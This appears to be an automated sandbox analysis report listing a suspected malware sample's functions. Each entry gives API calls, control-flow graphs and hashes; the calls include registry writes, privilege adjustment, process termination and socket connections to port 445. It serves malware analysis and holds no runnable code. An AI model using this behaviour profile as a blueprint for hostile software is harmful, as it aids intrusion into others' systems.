      • Instruction Fuzzy Hash: 0311D372600316AFCB10AF68CCC5A6ABBA8FB4A359F104A3AF454C3212D731D954CBE1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA2161 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
        • Part of subcall function 00CA530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,?,?,00CA2195), ref: 00CA5327
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,00CA2195), ref: 00CA5347
        • Part of subcall function 00CA530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00CA2195), ref: 00CA5352
      • GetComputerNameW.KERNEL32(00000010,00000008), ref: 00CA21D5
      • Sleep.KERNELBASE(00002710), ref: 00CA2297
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventHeap$AllocateComputerCountCriticalInitializeNameProcessSectionSleepSpin
      • String ID: \\?\UNC\\\e-
      • API String ID: 1430921793-4184602625
      • Opcode ID: 59cf05daf42f5b85979dab41ae89eb4a2f5b2e40171a56bc0edbdabb2aa472fe
      • Instruction ID: 09ef58354e109b8346f64269fb30f038e775cc3f606f89c667d20aa3a2d48d84
      • Opcode Fuzzy Hash: 59cf05daf42f5b85979dab41ae89eb4a2f5b2e40171a56bc0edbdabb2aa472fe
      • Instruction Fuzzy Hash: 8141087290020ABAEB11EBA4DC87FAF777CEF56758F244015FA00A60C2D7709F44E6A5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3A18 Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 640 ca3a18-ca3a4c RegOpenKeyExW 641 ca3a4e-ca3a68 RegQueryValueExW 640->641 642 ca3a7f-ca3a85 640->642 643 ca3a6a-ca3a6f 641->643 644 ca3a86-ca3a91 641->644 643->644 645 ca3a71-ca3a74 643->645 646 ca3a76-ca3a79 RegCloseKey 644->646 645->646 646->642
      APIs
      • RegOpenKeyExW.KERNELBASE(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 00CA3A44
      • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00CA3A60
      • RegCloseKey.KERNELBASE(?), ref: 00CA3A79
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseOpenQueryValue
      • String ID:
      • API String ID: 3677997916-0
      • Opcode ID: 22a826c65a280ec82804fdf00c72e00240d09d3bf51fa0039be14288575995db
      • Instruction ID: a38200b811c682d298885fb3fff68888030efc8e0264efa8244693f39f66e598
      • Opcode Fuzzy Hash: 22a826c65a280ec82804fdf00c72e00240d09d3bf51fa0039be14288575995db
      • Instruction Fuzzy Hash: 1511B3B190024EAFDB11CF99D8849AEBBB8FB49348B10446AE955E2120D7309F55EB51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA239A Relevance: 3.8, APIs: 3, Instructions: 55sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 647 ca239a-ca23b7 call ca3e39 call ca3955 652 ca23ba-ca23c4 call ca5962 647->652 655 ca23d2-ca23e5 call ca4f7a 652->655 656 ca23c6-ca23d0 call ca5962 652->656 662 ca240b-ca2416 Sleep 655->662 663 ca23e7-ca23ea 655->663 656->655 661 ca2418-ca242c call ca3955 656->661 662->652 664 ca23ec-ca23ef 663->664 665 ca23f1 663->665 667 ca23f4-ca2405 EnterCriticalSection LeaveCriticalSection 664->667 665->667 667->662
      APIs
        • Part of subcall function 00CA3E39: GetVersion.KERNEL32(?,00CA2B0D), ref: 00CA3E42
        • Part of subcall function 00CA5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00CA2E54), ref: 00CA596A
        • Part of subcall function 00CA5962: LeaveCriticalSection.KERNEL32(?), ref: 00CA5973
      • EnterCriticalSection.KERNEL32(00000004), ref: 00CA23F8
      • LeaveCriticalSection.KERNEL32(00000004), ref: 00CA2405
      • Sleep.KERNELBASE(000003E8), ref: 00CA2410
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EnterLeave$SleepVersion
      • String ID:
      • API String ID: 3495237732-0
      • Opcode ID: 5a688b708eab981be5f6b8434dbc36e987ce89d2e2a7cee8ed6520fa5bdbfab6
      • Instruction ID: a433f2700f55632a8d6343877affd23fd4c5832920a66d97c411cdc2d791bb11
      • Opcode Fuzzy Hash: 5a688b708eab981be5f6b8434dbc36e987ce89d2e2a7cee8ed6520fa5bdbfab6
      • Instruction Fuzzy Hash: 4E01C472500213EBDB109BA5DC05B5EB768BB43358F104025F6069B1A1D774EE54E7A1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA4F7A Relevance: 3.0, APIs: 2, Instructions: 20synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 669 ca4f7a-ca4f90 call ca4ea5 672 ca4f92-ca4f9e ReleaseMutex CloseHandle 669->672 673 ca4fa4-ca4fa8 669->673 672->673
      APIs
        • Part of subcall function 00CA4EA5: OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F1E
        • Part of subcall function 00CA4EA5: CreateMutexW.KERNELBASE(00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CA4F2D
        • Part of subcall function 00CA4EA5: WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00CA4F3C
        • Part of subcall function 00CA4EA5: CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 00CA4F56
      • ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00CA2C6F,00000001), ref: 00CA4F95
      • CloseHandle.KERNEL32(?,?,00CA2C6F,00000001), ref: 00CA4F9E
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseHandle$CreateObjectOpenReleaseSingleWait
      • String ID:
      • API String ID: 2599181272-0
      • Opcode ID: ab05b54bc0b264117b3f34383586815d57e139a276d0c7b9e63c5d29afd170e9
      • Instruction ID: a24696d9b33ae03e19e268bbc360c916dd45136d567c9df19000f0047bc696ff
      • Opcode Fuzzy Hash: ab05b54bc0b264117b3f34383586815d57e139a276d0c7b9e63c5d29afd170e9
      • Instruction Fuzzy Hash: FCD0127290012DFFDF155B94DC0A99EBB38EF427697100160F90163120D7719F14E7D0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3A93 Relevance: 3.0, APIs: 2, Instructions: 19registryCOMMON
      Download Yara Rule
      APIs
      • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00CA1408,?,00000104,?,00CA1408,00000000,00000000), ref: 00CA3AA6
      • RegCloseKey.ADVAPI32(?,?,00CA1408,00000000,00000000), ref: 00CA3AB2
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseValue
      • String ID:
      • API String ID: 3132538880-0
      • Opcode ID: 526798ab0c53c218020ea8c3bb9ce01317e63d4cd570e615531a5e3be3c3e35b
      • Instruction ID: 3bf61f5f252dc54b054aa125c02bc4f5ea1eb988c36acb970b6280ecd085ab35
      • Opcode Fuzzy Hash: 526798ab0c53c218020ea8c3bb9ce01317e63d4cd570e615531a5e3be3c3e35b
      • Instruction Fuzzy Hash: 24D05E3618011AFFDF225FA4DC05FEABB6AEF09715F004020FA0A860B0D7739524EB91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA9041 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
      Download Yara Rule
      APIs
      • GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
      • RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocateProcess
      • String ID:
      • API String ID: 1357844191-0
      • Opcode ID: 97e4e6fab78de6740c75d12757d62db5537030e458b379646d226bcaadf8ea1e
      • Instruction ID: cd64f9d0bd827d124fa738c590ebc11970936f9cce0810698302f5c57263baa3
      • Opcode Fuzzy Hash: 97e4e6fab78de6740c75d12757d62db5537030e458b379646d226bcaadf8ea1e
      • Instruction Fuzzy Hash: E8C048B0704201BFEE509BA99E09B2E36ACEB86B4AF100444FA5BC6050D7388800CA22
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA2FA7 Relevance: 3.0, APIs: 2, Instructions: 3COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA29F5: GetTickCount.KERNEL32 ref: 00CA2A94
        • Part of subcall function 00CA29F5: GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00CA2AB4
      • ExitProcess.KERNEL32 ref: 00CA2FAE
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountExitInfoLocaleProcessTick
      • String ID:
      • API String ID: 1528680899-0
      • Opcode ID: ea02e0e1408bf37a5033100b67f4fe650eda311a04e4961808d8c4554c1fb90e
      • Instruction ID: d18c215bffee67ff7b4cabf31d1487dab16616933bb5676a97d5d08329351702
      • Opcode Fuzzy Hash: ea02e0e1408bf37a5033100b67f4fe650eda311a04e4961808d8c4554c1fb90e
      • Instruction Fuzzy Hash: 0590022114411296E1912774590E74D35105707B0EF014100B106550A15E900000A522
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3B33 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,?,?,00CA28D8,00000000,00000000,00000000), ref: 00CA3B81
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocateEnvironmentExpandProcessStrings
      • String ID:
      • API String ID: 2571445646-0
      • Opcode ID: 103b71570e5b766bbe0aca873ee826d97c600345444293e2dbf6159d1f524e77
      • Instruction ID: 9e65f5ff8f6956d4803429eee1fc177c503a9a9d3924f90536d6bebf170eb292
      • Opcode Fuzzy Hash: 103b71570e5b766bbe0aca873ee826d97c600345444293e2dbf6159d1f524e77
      • Instruction Fuzzy Hash: 1801F033500245BBDF216BA5EC4BD5F7E6ADFC63A4B204025F50597150D9718F01A770
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA3C7A Relevance: 1.5, APIs: 1, Instructions: 36COMMON
      Download Yara Rule
      APIs
      • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CA28D8,00000000,00000000), ref: 00CA3CA2
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: 2c5e746b3fe39248d183ecba902a3173f153f86771c8583d30fae1e94c36153b
      • Instruction ID: fc96038c8d84b9330d2656ebc0441f62c47583e32445d0a022aa8daa7afd7aeb
      • Opcode Fuzzy Hash: 2c5e746b3fe39248d183ecba902a3173f153f86771c8583d30fae1e94c36153b
      • Instruction Fuzzy Hash: BEE06572501129BEA620AB529D4ADFF7F7CDE83AB8B10005AF80497140EA706F01E6F1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA24C2 Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA9041: GetProcessHeap.KERNEL32(00000000,?,00CA62B1,00000030,?,00000040,00CA2A6F,00CAB410), ref: 00CA904D
        • Part of subcall function 00CA9041: RtlAllocateHeap.NTDLL(00000000), ref: 00CA9054
      • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 00CA24F8
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Heap$AllocateCreateProcessThread
      • String ID:
      • API String ID: 2224927103-0
      • Opcode ID: e5df67151b92ab6503844a133f4f617648d4fd8486665fa86aef4d3e4701554f
      • Instruction ID: beb444d948b066d4bbd1d55951ba89d9f8c9c11daacd7ed981e62c709a90514f
      • Opcode Fuzzy Hash: e5df67151b92ab6503844a133f4f617648d4fd8486665fa86aef4d3e4701554f
      • Instruction Fuzzy Hash: 75F01CB1514209AFCB08CF55E885C5BBBE9FF88310B14C669F90D8B221D330D8518BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA22EE Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00CA3DC0: GetCurrentProcess.KERNEL32(00000020,00CA232B,00000000,?,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DD5
        • Part of subcall function 00CA3DC0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3DDC
        • Part of subcall function 00CA3DC0: LookupPrivilegeValueW.ADVAPI32(00000000,00CA232B,?), ref: 00CA3DEE
        • Part of subcall function 00CA3DC0: AdjustTokenPrivileges.KERNELBASE(00CA232B,00000000,?,00000000,00000000,00000000), ref: 00CA3E1D
        • Part of subcall function 00CA3DC0: FindCloseChangeNotification.KERNELBASE(00CA232B,?,?,?,?,?,?,?,00CA232B,00000000), ref: 00CA3E2D
        • Part of subcall function 00CA4DEE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CA4E00
        • Part of subcall function 00CA4DEE: Process32FirstW.KERNEL32(00CA2351,?), ref: 00CA4E38
        • Part of subcall function 00CA4DEE: OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 00CA4E68
        • Part of subcall function 00CA4DEE: TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00CA4E76
        • Part of subcall function 00CA4DEE: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CA4E7F
        • Part of subcall function 00CA4DEE: Process32NextW.KERNEL32(00CA2351,?), ref: 00CA4E8E
        • Part of subcall function 00CA4DEE: FindCloseChangeNotification.KERNELBASE(00CA2351,?,?,?), ref: 00CA4E9C
      • Sleep.KERNELBASE(?), ref: 00CA2358
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Process$Close$ChangeFindNotificationOpenProcess32Token$AdjustCreateCurrentFirstHandleLookupNextPrivilegePrivilegesSleepSnapshotTerminateToolhelp32Value
      • String ID:
      • API String ID: 1099845645-0
      • Opcode ID: 9a8e6ffeb62a49701ef02131e8499f1e6c08631a7790716be089aa37192f717e
      • Instruction ID: 188db62d4492574a38619439666c56fa9d089c29ba015ce632982b18212c00b2
      • Opcode Fuzzy Hash: 9a8e6ffeb62a49701ef02131e8499f1e6c08631a7790716be089aa37192f717e
      • Instruction Fuzzy Hash: B311947290020ABFEF11BBB4DC83EAFB76CDF03398F14406AF10456092DA759F81A661
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 00CA5067 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 158networkCOMMON
      Download Yara Rule
      APIs
      • htons.WS2_32(000001BD), ref: 00CA5085
        • Part of subcall function 00CA905B: GetProcessHeap.KERNEL32(00000008,00000000,00CA92F9,00000001,00000002,00000000,00000000,00CA3BCD,00000000,00000000,00000000,00000000,?,?,?,00CA3C8D), ref: 00CA906C
        • Part of subcall function 00CA905B: HeapAlloc.KERNEL32(00000000,?,00CA3C8D,00000017,00000000,00000000,?,?,?,00CA28D8,00000000,00000000,00000000), ref: 00CA9073
      • htonl.WS2_32(00000000), ref: 00CA50DB
      • socket.WS2_32(00000002,00000001,00000006), ref: 00CA50EC
      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00CA5102
      • connect.WS2_32(00000000,?,00000010), ref: 00CA5113
      • WSAGetLastError.WS2_32 ref: 00CA511D
      • getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 00CA517C
      • recv.WS2_32(?,?,00000001,00000002), ref: 00CA5195
      • WSAGetLastError.WS2_32 ref: 00CA51A2
      • getpeername.WS2_32(?,?,?), ref: 00CA51C9
      • closesocket.WS2_32(?), ref: 00CA51E3
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ErrorHeapLast$AllocProcessclosesocketconnectgetpeernamegetsockopthtonlhtonsioctlsocketrecvsocket
      • String ID: 3'
      • API String ID: 1659685214-280543908
      • Opcode ID: 1eb27ae4c75d3899bf9031ac2a73f6f1c675865f8e9f472cd569ea3ef9b49364
      • Instruction ID: 0313593124699d64b8a861200b96c8c4f45667884207209b9d9c09ce6ef8c73c
      • Opcode Fuzzy Hash: 1eb27ae4c75d3899bf9031ac2a73f6f1c675865f8e9f472cd569ea3ef9b49364
      • Instruction Fuzzy Hash: DF514C71E0060AFFDF219FA4D885BEEBBB4EF0A319F104129EA51B7150D7719A41CB91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA77DF Relevance: 15.1, APIs: 10, Instructions: 54timethreadCOMMON
      Download Yara Rule
      APIs
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00CAD6A0,00000FA0,00000000,00000000,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA77F2
      • EnterCriticalSection.KERNEL32(00CAD6A0,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA77F9
      • QueryPerformanceCounter.KERNEL32(00CA17C2,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7809
      • GetTickCount.KERNEL32 ref: 00CA780B
      • GetCurrentProcessId.KERNEL32(?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7829
      • GetCurrentThreadId.KERNEL32 ref: 00CA7835
      • GetLocalTime.KERNEL32(?,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7845
      • SystemTimeToFileTime.KERNEL32(?,00000000,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7853
      • QueryPerformanceCounter.KERNEL32(00CA17C2,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA786F
      • LeaveCriticalSection.KERNEL32(00CAD6A0,?,00CA78B7,00000000,00000000,00000000,?,00CA17C2,?), ref: 00CA7899
      Memory Dump Source
      • Source File: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
      • Associated: 00000002.00000002.4236784157.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237091951.0000000000CAA000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237250386.0000000000CAB000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237378035.0000000000CAE000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000002.00000002.4237534791.0000000000CAF000.00000008.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_ca0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSectionTime$CountCounterCurrentPerformanceQuery$EnterFileInitializeLeaveLocalProcessSpinSystemThreadTick
      • String ID:
      • API String ID: 1260023459-0
      • Opcode ID: cc105831b51113ceabfce71487bdc6bace4dd1c8b4ba4c5711fc8ef872779ea7
      • Instruction ID: 8a2552f4df2a29cccecd2469832cc6b97ffb6548e6b7c07a33eb76b4c2ca2f46
      • Opcode Fuzzy Hash: cc105831b51113ceabfce71487bdc6bace4dd1c8b4ba4c5711fc8ef872779ea7
      • Instruction Fuzzy Hash: E811A271900208AFCB05DBB4ED49B9E7BF8FB4E319B420966F10BE7520D7789684DB52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00CA4428 Relevance: 13.6, APIs: 9, Instructions: 109memoryCOMMON
      Download Yara Rule
      APIs
      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000), ref: 00CA444F
      • OpenProcessToken.ADVAPI32(00000000), ref: 00CA4456
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00CA497D,00CA497D,00000000), ref: 00CA4478
